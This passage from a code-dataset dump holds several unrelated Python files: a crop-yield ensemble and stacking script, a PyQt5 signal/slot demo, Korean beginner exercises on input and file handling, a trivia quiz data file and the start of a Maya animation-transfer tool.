= LGBMRegressor(objective='regression', **params)\n for train_index, test_index in kf.split(X):\n LGB_B = G1_B.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n LGB_df_B = pd.concat([LGB_df_B, pd.DataFrame(G1_B.predict(np.array(X.drop(columns='Year'))[test_index]))])\n loss_LGB = mse(data_d.Yield[(data_d.Year < 2018)], LGB_df_B)\n return {'loss': loss_LGB, 'params': params, 'status': STATUS_OK}\n\nspace_LGB = {'num_leaves': hp.choice('num_leaves', [int(x) for x in np.arange(5, 40, 2)]),\n 'learning_rate': hp.uniform('learning_rate', 0.1, 0.5),\n 'n_estimators': hp.choice('n_estimators', [500, 1000, 1500, 2000])}\ntpe_algorithm = tpe.suggest\ntrials_LGB = Trials()\nbest_LGB = fmin(fn=objective_LGB, space=space_LGB, algo=tpe.suggest,\n max_evals=max_evals, trials=trials_LGB, rstate=np.random.RandomState(1369))\nLGB_param_B = pd.DataFrame({'num_leaves': [], 'learning_rate': [], 'n_estimators': []})\nfor i in range(max_evals):\n LGB_param_B.num_leaves[i] = trials_LGB.results[i]['params']['num_leaves']\n LGB_param_B.learning_rate[i] = trials_LGB.results[i]['params']['learning_rate']\n LGB_param_B.n_estimators[i] = trials_LGB.results[i]['params']['n_estimators']\nLGB_param_B = pd.DataFrame({'num_leaves': LGB_param_B.num_leaves,\n 'learning_rate': LGB_param_B.learning_rate,\n 'n_estimators': LGB_param_B.n_estimators})\n\n\ndef objective_RF(params):\n RF_df_B = pd.DataFrame()\n R1_B = RandomForestRegressor(**params)\n for train_index, test_index in kf.split(X):\n RF_B = R1_B.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n RF_df_B = pd.concat([RF_df_B, pd.DataFrame(R1_B.predict(np.array(X.drop(columns='Year'))[test_index]))])\n loss_RF = mse(data_d.Yield[(data_d.Year < 2018)], RF_df_B)\n return {'loss': loss_RF, 'params': params, 'status': STATUS_OK}\n\nspace_RF = {'n_estimators': hp.choice('n_estimators', [100, 200, 300, 500]),\n 'max_depth': hp.choice('max_depth', [int(x) for x in np.arange(5, 41, 5)])}\ntpe_algorithm = tpe.suggest\ntrials_RF = Trials()\nbest_RF = fmin(fn=objective_RF, space=space_RF, algo=tpe.suggest,\n max_evals=max_evals, trials=trials_RF, rstate=np.random.RandomState(1369))\nRF_param_B = pd.DataFrame({'n_estimators': [], 'max_depth': []})\nfor i in range(max_evals):\n RF_param_B.n_estimators[i] = trials_RF.results[i]['params']['n_estimators']\n RF_param_B.max_depth[i] = trials_RF.results[i]['params']['max_depth']\nRF_param_B = pd.DataFrame({'n_estimators': RF_param_B.n_estimators,\n 'max_depth': RF_param_B.max_depth})\n\n\n## ---------------- Permutation feature importance ---------------- ##\n\n\ndef perm_fi(model, cv, n_iter):\n perm = PermutationImportance(model, cv=cv, n_iter=n_iter).fit(X.drop(columns='Year'), Y)\n feature_importances = [(feature, importance) for feature, importance in zip(list(X.columns), list(np.abs(perm.feature_importances_)))]\n feature_importances = pd.DataFrame(sorted(feature_importances, key = lambda x: x[1], reverse = True))\n return feature_importances\n\n\n## ---------------- Building models ---------------- ##\nLASSO_df2 = pd.DataFrame()\nL2 = Lasso(alpha=trials_LASSO.best_trial['result']['params']['alpha'], random_state=1369)\nfor train_index, test_index in kf.split(X):\n L2.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n LASSO_df2 = pd.concat([LASSO_df2, pd.DataFrame(L2.predict(np.array(X.drop(columns='Year'))[test_index]))])\nLASSO_df2 = LASSO_df2.reset_index(drop=True)\nLASSO_mse2 = mse(data_d.Yield[(data_d.Year<2018)], LASSO_df2)\nLASSO = 
L2.fit(X.drop(columns='Year'), Y)\nLASSO_preds_test2 = LASSO.predict(x_test.drop(columns='Year'))\npd.DataFrame(LASSO_preds_test2).to_csv('LASSO_preds_test_2018.csv')\nLASSO_mse_test2 = mse(data_d.Yield[data_d.Year==2018], LASSO_preds_test2)\nLASSO_rmse_test2 = np.sqrt(LASSO_mse_test2)\nLASSO_preds_train = LASSO.predict(X.drop(columns='Year'))\npd.DataFrame(LASSO_preds_train).to_csv('LASSO_preds_train_2018.csv')\nLASSO_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], LASSO_preds_train))\nfeature_importances_lasso = perm_fi(L2, cv, 10)\nfeature_importances_lasso.to_csv('feature_importances_lasso_2018.csv')\n\n\n\n### ---------- XGB ------------ ###\nXGB_df2 = pd.DataFrame()\nX2 = XGBRegressor(objective='reg:squarederror',\n gamma=trials_XGB.best_trial['result']['params']['gamma'],\n learning_rate=trials_XGB.best_trial['result']['params']['learning_rate'],\n n_estimators=int(trials_XGB.best_trial['result']['params']['n_estimators']),\n max_depth=int(trials_XGB.best_trial['result']['params']['max_depth']), random_state=1369)\nfor train_index, test_index in kf.split(X):\n X2.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n XGB_df2 = pd.concat([XGB_df2, pd.DataFrame(X2.predict(np.array(X.drop(columns='Year'))[test_index]))])\nXGB_df2 = XGB_df2.reset_index(drop=True)\nXGB_mse2 = mse(data_d.Yield[(data_d.Year<2018)], XGB_df2)\nXGB = X2.fit(X.drop(columns='Year'), Y)\nXGB_preds_test2 = XGB.predict(x_test.drop(columns='Year'))\npd.DataFrame(XGB_preds_test2).to_csv('XGB_preds_test_2018.csv')\nXGB_mse_test2 = mse(data_d.Yield[data_d.Year==2018], XGB_preds_test2)\nXGB_rmse_test2 = np.sqrt(XGB_mse_test2)\nXGB_preds_train = XGB.predict(X.drop(columns='Year'))\npd.DataFrame(XGB_preds_train).to_csv('XGB_preds_train_2018.csv')\nXGB_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], XGB_preds_train))\nperm_xgb = PermutationImportance(X2, cv=cv, n_iter=10).fit(X.as_matrix(), Y.as_matrix())\nfeature_importances_xgb = [(feature, importance) for feature, importance in\n zip(list(X.columns), list(np.abs(perm_xgb.feature_importances_)))]\nfeature_importances_xgb = pd.DataFrame(sorted(feature_importances_xgb, key=lambda x: x[1], reverse=True))\nfeature_importances_xgb.to_csv('feature_importances_xgb_2018.csv')\n\n\n### ---------- LGB ------------ ###\nLGB_df2 = pd.DataFrame()\nG2 = LGBMRegressor(objective='regression', random_state=1369,\n num_leaves=int(trials_LGB.best_trial['result']['params']['num_leaves']),\n learning_rate=trials_LGB.best_trial['result']['params']['learning_rate'],\n n_estimators=int(trials_LGB.best_trial['result']['params']['n_estimators']))\nfor train_index, test_index in kf.split(X):\n G2.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n LGB_df2 = pd.concat([LGB_df2, pd.DataFrame(G2.predict(np.array(X.drop(columns='Year'))[test_index]))])\nLGB_df2 = LGB_df2.reset_index(drop=True)\nLGB_mse2 = mse(data_d.Yield[(data_d.Year<2018)], LGB_df2)\nLGB = G2.fit(X.drop(columns='Year'), Y)\nLGB_preds_test2 = LGB.predict(x_test.drop(columns='Year'))\npd.DataFrame(LGB_preds_test2).to_csv('LGB_preds_test_2018.csv')\nLGB_mse_test2 = mse(data_d.Yield[data_d.Year==2018], LGB_preds_test2)\nLGB_rmse_test2 = np.sqrt(LGB_mse_test2)\nLGB_preds_train = LGB.predict(X.drop(columns='Year'))\npd.DataFrame(LGB_preds_train).to_csv('LGB_preds_train_2018.csv')\nLGB_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], LGB_preds_train))\nfeature_importances_lgb = perm_fi(G2, cv, 
10)\nfeature_importances_lgb.to_csv('feature_importances_lgb_2018.csv')\n\n\n### ---------- RF ------------ ###\nRF_df2 = pd.DataFrame()\nR2 = RandomForestRegressor(max_depth=int(trials_RF.best_trial['result']['params']['max_depth']),\n n_estimators=int(trials_RF.best_trial['result']['params']['n_estimators']), random_state=1369)\nfor train_index, test_index in kf.split(X):\n R2.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n RF_df2 = pd.concat([RF_df2, pd.DataFrame(R2.predict(np.array(X.drop(columns='Year'))[test_index]))])\nRF_df2 = RF_df2.reset_index(drop=True)\nRF_mse2 = mse(data_d.Yield[(data_d.Year<2018)], RF_df2)\nRF = R2.fit(X.drop(columns='Year'), Y)\nRF_preds_test2 = RF.predict(x_test.drop(columns='Year'))\npd.DataFrame(RF_preds_test2).to_csv('RF_preds_test_2018.csv')\nRF_mse_test2 = mse(data_d.Yield[data_d.Year==2018], RF_preds_test2)\nRF_rmse_test2 = np.sqrt(RF_mse_test2)\nRF_preds_train = RF.predict(X.drop(columns='Year'))\npd.DataFrame(RF_preds_train).to_csv('RF_preds_train_2018.csv')\nRF_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], RF_preds_train))\nfeature_importances_rf = perm_fi(R2, cv, 10)\nfeature_importances_rf.to_csv('feature_importances_rf_2018.csv')\n\n\n### ---------- LR ------------ ###\nLR_df2 = pd.DataFrame()\nlm2 = LinearRegression()\nlm2.fit(X.drop(columns='Year'),Y)\nfor train_index, test_index in kf.split(X):\n lm2.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n LR_df2 = pd.concat([LR_df2, pd.DataFrame(lm2.predict(np.array(X.drop(columns='Year'))[test_index]))])\nLR_df2 = LR_df2.reset_index(drop=True)\nLR_mse2 = mse(data_d.Yield[(data_d.Year<2018)], LR_df2)\nLR = lm2.fit(X.drop(columns='Year'), Y)\nLR_preds_test2 = LR.predict(x_test.drop(columns='Year'))\npd.DataFrame(LR_preds_test2).to_csv('LR_preds_test2_2018.csv')\nLR_mse_test2 = mse(data_d.Yield[data_d.Year==2018], LR_preds_test2)\nLR_rmse_test2 = np.sqrt(LR_mse_test2)\nLR_preds_train = LR.predict(X.drop(columns='Year'))\npd.DataFrame(LR_preds_train).to_csv('LR_preds_train_2018.csv')\nLR_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], LR_preds_train))\nfeature_importances_lr = perm_fi(lm2, cv, 10)\nfeature_importances_lr.to_csv('feature_importances_lr_2018.csv')\n\n\n\n## ---------------- Optimizing Ensembles ---------------- ##\n\ndef objective2(y):\n return mse(data_d.Yield[(data_d.Year<2018)],\n (y[0]*LASSO_df2 + y[1]*XGB_df2 + y[2]*LGB_df2 + y[3]*RF_df2 + y[4]*LR_df2))\n\ndef constraint12(y):\n return y[0] + y[1] + y[2] + y[3] + y[4] - 1.0\ndef constraint22(y):\n return LASSO_mse2 - objective2(y)\ndef constraint32(y):\n return XGB_mse2 - objective2(y)\ndef constraint42(y):\n return LGB_mse2 - objective2(y)\ndef constraint52(y):\n return RF_mse2 - objective2(y)\ndef constraint62(y):\n return LR_mse2 - objective2(y)\n\n\ny0 = np.zeros(5)\ny0[0] = 1 / 5\ny0[1] = 1 / 5\ny0[2] = 1 / 5\ny0[3] = 1 / 5\ny0[4] = 1 / 5\n\nb = (0, 1.0)\nbnds2 = (b, b, b, b, b)\ncon12 = {'type': 'eq', 'fun': constraint12}\ncon22 = {'type': 'ineq', 'fun': constraint22}\ncon32 = {'type': 'ineq', 'fun': constraint32}\ncon42 = {'type': 'ineq', 'fun': constraint42}\ncon52 = {'type': 'ineq', 'fun': constraint52}\ncon62 = {'type': 'ineq', 'fun': constraint62}\n\ncons2 = [con12, con22, con32, con42, con52, con62]\n\nsolution2 = minimize(objective2, y0, method='SLSQP',\n options={'disp': True, 'maxiter': 3000, 'eps': 1e-3}, bounds=bnds2,\n constraints=cons2)\ny = solution2.x\n\ncowe_preds_test = y[0]*LASSO_preds_test2 + y[1]*XGB_preds_test2 + 
y[2]*LGB_preds_test2 + y[3]*RF_preds_test2 + y[4]*LR_preds_test2\ncowe_mse_test = mse(data_d.Yield[data_d.Year==2018], cowe_preds_test)\ncowe_rmse_test = np.sqrt(cowe_mse_test)\npd.DataFrame(cowe_preds_test).to_csv('cowe_preds_test_2018.csv')\ncowe_preds_train = y[0]*LASSO_preds_train + y[1]*XGB_preds_train + y[2]*LGB_preds_train + y[3]*RF_preds_train + y[4]*LR_preds_train\npd.DataFrame(cowe_preds_train).to_csv('cowe_preds_train_2018.csv')\ncowe_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], cowe_preds_train))\n\n\ncowe_preds_CV = y[0]*LASSO_df2 + y[1]*XGB_df2 + y[2]*LGB_df2 + y[3]*RF_df2 + y[4]*LR_df2\ncowe_mse_CV = mse(data_d.Yield[(data_d.Year<2018)], cowe_preds_CV)\ncowe_rmse_CV = np.sqrt(cowe_mse_CV)\n\n\ncls_preds_test = y0[0]*LASSO_preds_test2 + y0[1]*XGB_preds_test2 + y0[2]*LGB_preds_test2 + y0[3]*RF_preds_test2 + y0[4]*LR_preds_test2\ncls_mse_test = mse(data_d.Yield[data_d.Year==2018], cls_preds_test)\ncls_rmse_test = np.sqrt(cls_mse_test)\npd.DataFrame(cls_preds_test).to_csv('cls_preds_test_2018.csv')\ncls_preds_train = y0[0]*LASSO_preds_train + y0[1]*XGB_preds_train + y0[2]*LGB_preds_train + y0[3]*RF_preds_train + y0[4]*LR_preds_train\npd.DataFrame(cls_preds_train).to_csv('cls_preds_train_2018.csv')\ncls_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], cls_preds_train))\n\n\ncls_preds_CV = y0[0]*LASSO_df2 + y0[1]*XGB_df2 + y0[2]*LGB_df2 + y0[3]*RF_df2 + y0[4]*LR_df2\ncls_mse_CV = mse(data_d.Yield[(data_d.Year<2018)], cls_preds_CV)\ncls_rmse_CV = np.sqrt(cls_mse_CV)\n\n\n\n## -------------------------------- STACKING -------------------------------- ##\n\npredsDF2 = pd.DataFrame()\npredsDF2['LASSO'] = LASSO_df2[0]\npredsDF2['XGB']= XGB_df2[0]\npredsDF2['LGB'] = LGB_df2[0]\npredsDF2['RF'] = RF_df2[0]\npredsDF2['LR'] = LR_df2[0]\npredsDF2['Y'] = data_d.Yield[(data_d.Year < 2018)].reset_index(drop=True)\nx_stacked2 = predsDF2.drop(columns='Y', axis=1)\ny_stacked2 = predsDF2['Y']\ntestPreds2 = pd.DataFrame([LASSO_preds_test2, XGB_preds_test2, LGB_preds_test2, RF_preds_test2, LR_preds_test2]).T\ntestPreds2.columns = ['LASSO', 'XGB', 'LGB', 'RF', 'LR']\n\n\nstck_reg2 = LinearRegression()\nstck_reg2.fit(x_stacked2, y_stacked2)\nstck_reg_preds_test2 = stck_reg2.predict(testPreds2)\nstck_reg_mse_test2 = mse(data_d.Yield[data_d.Year == 2018], stck_reg_preds_test2)\nstck_reg_rmse_test2 = np.sqrt(stck_reg_mse_test2)\npd.DataFrame(stck_reg_preds_test2).to_csv('stck_reg_preds_test_2018.csv')\nstck_reg_preds_train = stck_reg2.predict(x_stacked2)\npd.DataFrame(stck_reg_preds_train).to_csv('stck_reg_preds_train_2018.csv')\nstck_reg_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year < 2018], stck_reg_preds_train))\n\nstck_lasso2 = Lasso()\nstck_lasso2.fit(x_stacked2, y_stacked2)\nstck_lasso_preds_test2 = stck_lasso2.predict(testPreds2)\nstck_lasso_mse_test2 = mse(data_d.Yield[data_d.Year == 2018], stck_lasso_preds_test2)\nstck_lasso_rmse_test2 = np.sqrt(stck_lasso_mse_test2)\npd.DataFrame(stck_lasso_preds_test2).to_csv('stck_lasso_preds_test_2018.csv')\nstck_lasso_preds_train = stck_lasso2.predict(x_stacked2)\npd.DataFrame(stck_lasso_preds_train).to_csv('stck_lasso_preds_train_2018.csv')\nstck_lasso_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year < 2018], stck_lasso_preds_train))\n\nstck_rf2 = RandomForestRegressor()\nstck_rf2.fit(x_stacked2, y_stacked2)\nstck_rf_preds_test2 = stck_rf2.predict(testPreds2)\nstck_rf_mse_test2 = mse(data_d.Yield[data_d.Year == 2018], stck_rf_preds_test2)\nstck_rf_rmse_test2 = 
np.sqrt(stck_rf_mse_test2)\npd.DataFrame(stck_rf_preds_test2).to_csv('stck_rf_preds_test_2018.csv')\nstck_rf_preds_train = stck_rf2.predict(x_stacked2)\npd.DataFrame(stck_rf_preds_train).to_csv('stck_rf_preds_train_2018.csv')\nstck_rf_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year < 2018], stck_rf_preds_train))\n\nstck_lgb2 = LGBMRegressor()\nstck_lgb2.fit(x_stacked2, y_stacked2)\nstck_lgb_preds_test2 = stck_lgb2.predict(testPreds2)\nstck_lgb_mse_test2 = mse(data_d.Yield[data_d.Year == 2018], stck_lgb_preds_test2)\nstck_lgb_rmse_test2 = np.sqrt(stck_lgb_mse_test2)\npd.DataFrame(stck_lgb_preds_test2).to_csv('stck_lgb_preds_test_2018.csv')\nstck_lgb_preds_train = stck_lgb2.predict(x_stacked2)\npd.DataFrame(stck_lgb_preds_train).to_csv('stck_lgb_preds_train_2018.csv')\nstck_lgb_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year < 2018], stck_lgb_preds_train))\n\n\n\n## -------------------------- RESULTS -------------------------- ##\n\n\ntest_results = pd.DataFrame(data={'model':['RMSE'],'LASSO':[LASSO_rmse_test2], 'XGB':[XGB_rmse_test2], 'LGB':[LGB_rmse_test2],\n 'RF': [RF_rmse_test2], 'LR': [LR_rmse_test2],\n 'COWE': [cowe_rmse_test], 'Classical': [cls_rmse_test],\n 'stck_reg': [stck_reg_rmse_test2], 'stck_lasso': [stck_lasso_rmse_test2],\n 'stck_rf': [stck_rf_rmse_test2], 'stck_lgb': [stck_lgb_rmse_test2]})\n\ntrain_results = pd.DataFrame(data={'model':['RMSE'],'LASSO':[LASSO_rmse_train], 'XGB':[XGB_rmse_train], 'LGB':[LGB_rmse_train],\n 'RF': [RF_rmse_train], 'LR': [LR_rmse_train],\n 'COWE': [cowe_rmse_train], 'Classical': [cls_rmse_train],\n 'stck_reg': [stck_reg_rmse_train], 'stck_lasso': [stck_lasso_rmse_train],\n 'stck_rf': [stck_rf_rmse_train], 'stck_lgb': [stck_lgb_rmse_train]})\n\nCV_results = pd.DataFrame(data={'model':['RMSE'], 'LASSO':[np.sqrt(LASSO_mse2)], 'XGB':[np.sqrt(XGB_mse2)],\n 'LGB':[np.sqrt(LGB_mse2)], 'RF': [np.sqrt(RF_mse2)], 'LR': [np.sqrt(LR_mse2)],\n 'COWE': [cowe_rmse_CV],\n 'Classical':[cls_rmse_CV]})\n\ntest_results.to_csv('2018_test.csv')\ntrain_results.to_csv('2018_train.csv')\nCV_results.to_csv('2018_CV.csv')\n","repo_name":"mohsenshahhosseini/Coupling-ML-with-Crop-Modeling","sub_path":"2018.py","file_name":"2018.py","file_ext":"py","file_size_in_byte":27304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"21843902901","text":"# -*- coding: utf-8 -*-\n\n'''\n 【简介】\n 对话框关闭时返回值给主窗口例子\n'''\n\nimport sys\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom DateDialog2 import DateDialog\n\n\nclass WinForm(QWidget):\n def __init__(self, parent=None):\n super(WinForm, self).__init__(parent)\n self.resize(400, 90)\n self.setWindowTitle('信号与槽传递参数的示例')\n\n self.open_btn = QPushButton('获取时间')\n self.lineEdit_inner = QLineEdit(self)\n self.lineEdit_emit = QLineEdit(self)\n self.open_btn.clicked.connect(self.openDialog)\n\n self.lineEdit_inner.setText('接收子窗口内置信号的时间')\n self.lineEdit_emit.setText('接收子窗口自定义信号的时间')\n\n grid = QGridLayout()\n grid.addWidget(self.lineEdit_inner)\n grid.addWidget(self.lineEdit_emit)\n\n grid.addWidget(self.open_btn)\n self.setLayout(grid)\n\n def openDialog(self):\n dialog = DateDialog(self)\n '''连接子窗口的内置信号与主窗口的槽函数'''\n dialog.datetime_inner.dateTimeChanged.connect(self.deal_inner_slot)\n '''连接子窗口的自定义信号与主窗口的槽函数'''\n dialog.Signal_OneParameter.connect(self.deal_emit_slot)\n dialog.show()\n\n def deal_inner_slot(self, date):\n self.lineEdit_inner.setText(date.toString())\n\n\n def deal_emit_slot(self, dateStr):\n self.lineEdit_emit.setText(dateStr)\n\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n form = WinForm()\n form.show()\n sys.exit(app.exec_())\n","repo_name":"cxinping/PyQt5","sub_path":"Chapter07/transParam/CallDialogMainWin2.py","file_name":"CallDialogMainWin2.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":2140,"dataset":"github-code","pt":"16"}
+{"seq_id":"14964349050","text":"#Q1\n#주어진 자연수가 홀수인지 짝수인지 판별해 주는 함수(is_odd)를 작성해 보자.\ndef Q1():\n a = input(\"정수를 입력하세요\\n:\")\n a = int(a)\n if a % 2 == 1:\n print(\"홀수 입니다.\")\n else:\n print(\"짝수입니다.\")\n\n\n#Q2\n#입력으로 들어오는 모든 수의 평균 값을 계산해 주는 함수를 작성해 보자. (단 입력으로 들어오는 수의 개수는 정해져 있지 않다.)\n#※ 평균 값을 구할 때 len 함수를 사용해 보자.\n\ndef q2_input(): #input을 받아 리스트 형태로 li에 저장\n li = []\n i = 1\n while i != 100:\n b = int(input(\"정수를 입력하세요. (0을 입력하면 입력이 종료 됩니다.):\"))\n if b == 0: #input이 0 이라면 종료\n break\n else: #input이 정수라면 li에 추가\n li.append(b)\n return li\n\ndef q2_calculate(li): #리스트 li를 매개변수로 받아옴\n total = 0\n for c in li: #리스트의 원자를 하나씩 추출하여 total에 저장\n total = c + total\n avg = total / len(li)\n print(\"총 합은 :\\n\", total)\n print(\"평균은 :\")\n return avg\n\ndef Q2():\n li = q2_input()\n result = q2_calculate(li)\n print(result)\n return result\n\n#Q3\n#다음은 두 개의 숫자를 입력받아 더하여 돌려주는 프로그램이다.#이 프로그램을 수행해 보자.\n#첫번째 숫자를 입력하세요:3\n#두번째 숫자를 입력하세요:6\n#두 수의 합은 36 입니다\n#3과 6을 입력했을 때 9가 아닌 36이라는 결괏값을 돌려주었다. 이 프로그램의 오류를 수정해 보자.\n#※ int 함수를 사용해 보자.\ndef Q3():\n input1 = int(input(\"첫번째 숫자를 입력하세요:\"))\n input2 = int(input(\"두번째 숫자를 입력하세요:\"))\n total = input1 + input2\n print(\"두 수의 합은 %s 입니다\" % total)\n\n#Q4\n#다음 중 출력 결과가 다른 것 한 개를 골라 보자.\n#답 3번\ndef Q4():\n print(\"you\" \"need\" \"python\") #youneedpython\n print(\"you\"+\"need\"+\"python\") #youneedpython\n print(\"you\", \"need\", \"python\") #you need python\n print(\"\".join([\"you\", \"need\", \"python\"])) #youneedpython\n\n#Q5\n#다음은 \"test.txt\"라는 파일에 \"Life is too short\" 문자열을 저장한 후 다시 그 파일을 읽어서 출력하는 프로그램이다.\n#이 프로그램은 우리가 예상한 \"Life is too short\"라는 문장을 출력하지 않는다. 우리가 예상한 값을 출력할 수 있도록 프로그램을 수정해 보자.\n\n#답 : f1을 열어주고 닫는 구문이 없었음\ndef Q5():\n f1 = open(\"test.txt\", 'w')\n f1.write(\"Life is too short\")\n f1.close() #답 : 이 행을 추가\n f2 = open(\"test.txt\", 'r')\n print(f2.read())\n\n\n\n#Q6\n#사용자의 입력을 파일(test.txt)에 저장하는 프로그램을 작성해 보자. (단 프로그램을 다시 실행하더라도 기존에 작성한 내용을 유지하고 새로 입력한 내용을 추가해야 한다.)\ndef Q6():\n while True:\n a = input(\"텍스트 작성 : \")\n if a == '':\n print(\"종료\")\n break\n f1 = open(\"test.txt\", 'a')\n f1.write(a+\"\\n\")\n f1.close() #답 : 이 행을 추가\n f2 = open(\"test.txt\", 'r')\n print(f2.read())\n\n\n#Q7\n#다음과 같은 내용을 지닌 파일 test.txt가 있다. 이 파일의 내용 중 \"java\"라는 문자열을 \"python\"으로 바꾸어서 저장해 보자.\n#※ replace 함수를 사용해 보자.\n#Life is too short\n#you need java\ndef Q7():\n f = open('test.txt', 'r') #파일을 먼저 읽어 옴\n body = f.read() #읽어 온 파일을 body에 저장\n f.close()\n\n body = body.replace('java', 'python') #body값을 replace 함수로 값을 변경\n f = open('test.txt', 'w')\n f.write(body)\n f.close()\n f2 = open(\"test.txt\", 'r')\n print(f2.read())\n","repo_name":"Choijonghun/jhchoi_gitTest","sub_path":"4강_연습문제/Question.py","file_name":"Question.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"1641475849","text":"try:\n numero = int(input(\"Ingresa un número entero y positivo: \"))\nexcept:\n print(\"Número introducido inválido.\")\n exit()\n\ni = 0\n\nif numero <= 0:\n print(\"Número no válido\")\n exit()\n\nprint(\"--La tabla del {}--\".format(numero))\nwhile i < 10:\n i += 1\n print(\" {} * {} = {}\".format(numero , i , numero * i))","repo_name":"Adolfo-Cuevas28/Python_Adolf","sub_path":"11. Bucles/Ejercicio1While.py","file_name":"Ejercicio1While.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"30846784241","text":"from __future__ import division\nfrom jinja2.runtime import LoopContext, TemplateReference, Macro, Markup, TemplateRuntimeError, missing, concat, escape, markup_join, unicode_join, to_string, identity, TemplateNotFound\ndef run(environment):\n name = 'source/snippets/grids/landing.js'\n\n def root(context, environment=environment):\n if 0: yield None\n yield u\"\\njsonData = null\\n\\nfunction spiPreProcess(data)\\n{\\n\\tjsonData = data\\n\\n\\trecords = []\\n\\tfor (index in data.response.records)\\n\\t{\\n\\t\\trecords.push({'cell':[data.response.records[index].properties.title]});\\n\\t}\\n\\t\\n\\treturn {'total':records.length, 'page':1, 'rows':records};\\n}\"\n\n blocks = {}\n debug_info = ''\n return locals()","repo_name":"sgammon/StonerHub","sub_path":"templates/compiled/snippets/grids/landing.py","file_name":"landing.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"17382909216","text":"import classes\n\nquestions_text = [\n \"Which is the largest country in the world?\",\n \"How many days are there in a leap year?\",\n \"Which one of these four birds has the longest beak and feet?\",\n \"What is the national currency of the United States of America (USA)?\",\n \"Guido van Rossum in 1991 designed which language?\",\n \"Finish the sequence: 9, 18, 27, _?\",\n \"Which one is the first fully supported 64-bit operating system?\",\n \"Which animal is called the king of the jungle?\",\n \"what time corresponds to 23:23 hours ?\",\n \"Which team has won most number of IPL matches ?\",\n \"Which is the largest planet in our Solar system?\",\n \"How many continents are there in the world?\",\n \"How many years are there in one Millenium?\",\n \"ipad is manufactured by?\",\n \"Who founded Microsoft?\",\n]\n\nfirst_option = [\n \"India\",\n \"354\",\n \"Heron\",\n \"Euro\",\n \"Javascript\",\n \"36\",\n \"Windows 7\",\n \"Elephant\",\n \"11:23PM\",\n \"KKR\",\n \"Earth\",\n \"8\",\n \"100 years\",\n \"Google\",\n \"Monty Ritz\",\n]\n\nsecond_option = [\n \"USA\",\n \"366\",\n \"Parrot\",\n \"Peso \",\n \"Python\",\n \"34\",\n \"Linux\",\n \"Lion\",\n \"11.11PM\",\n \"CSK\",\n \"Uranus\",\n \"5\",\n \"50 years\",\n \"Microsoft\",\n \"Danis Lio\",\n]\n\nthird_option = [\n \"China\",\n \"365\",\n \"Crow\",\n \"Dollar\",\n \"Java\",\n \"30\",\n \"Mac\",\n \"Tiger\",\n \"7:23PM\",\n \"MI\",\n \"Mars\",\n \"7\",\n \"500 years\",\n \"Amazon\",\n \"Bill Gates\",\n]\n\nfourth_option = [\n \"Russia\",\n \"420\",\n \"Pigeon\",\n \"Yen\",\n \"C++\",\n \"37\",\n \"Windows XP\",\n \"Cow\",\n \"9.11PM\",\n \"RCB\",\n \"Jupiter\",\n \"6\",\n \"1000 years\",\n \"Apple\",\n \"Jeff Bezos\",\n]\n\ncorrect_answers = [\n \"Russia\",\n \"366\",\n \"Heron\",\n \"Dollar\",\n \"Python\",\n \"36\",\n \"Linux\",\n \"Lion\",\n \"7:23PM\",\n \"MI\",\n \"Jupiter\",\n \"7\",\n \"1000 years\",\n \"Apple\",\n \"Bill Gates\",\n]\n\nquestions = []\n\nfor i in range(len(questions_text)):\n questions.append(\n classes.Question(\n questions_text[i],\n first_option[i],\n second_option[i],\n third_option[i],\n fourth_option[i],\n correct_answers[i],\n )\n )\n","repo_name":"Mannatpreet22/trivia-quiz","sub_path":"KBC Quiz Game/kbc_data.py","file_name":"kbc_data.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71486519688","text":"# coding=utf-8\nimport os\nfrom imp import reload\n\nfrom animation import common\nfrom pymel import core as pm\n\nreload(common)\n\n\nclass TransferAnimTool(common.Singleton):\n \"\"\"\n 动画传递工具\n\n 将旧版的表情动画传递到新版表情控制器面板上面的一次性工具\n\n \"\"\"\n\n def __init__(self):\n super(TransferAnimTool, self).__init__()\n\n self.template_path = \"\"\n self.namespace = \"\"\n\n self.initialize()\n self.show()\n\n def show(self):\n if pm.window(\"transferAnimTool\", ex=True):\n pm.deleteUI(\"transferAnimTool\")\n pm.window(\n \"transferAnimTool\",\n title=u\"动画传递助手\",\n cc=lambda *args: self.close_main_window())\n form_layout = pm.formLayout()\n\n layout = pm.columnLayout(adj=1, rs=5)\n pm.textFieldButtonGrp(\n \"templateTextField\",\n label=u\"模板文件\",\n bl=u\"指定文件\",\n cw3=[70, 200, 100],\n adj=2,\n text=self.template_path,\n bc=lambda *args: self.load_template_file())\n pm.textFieldGrp(\n \"namespaceTextField\",\n label=\"Namespace:\",\n cw2=[70, 200],\n adj=2,\n 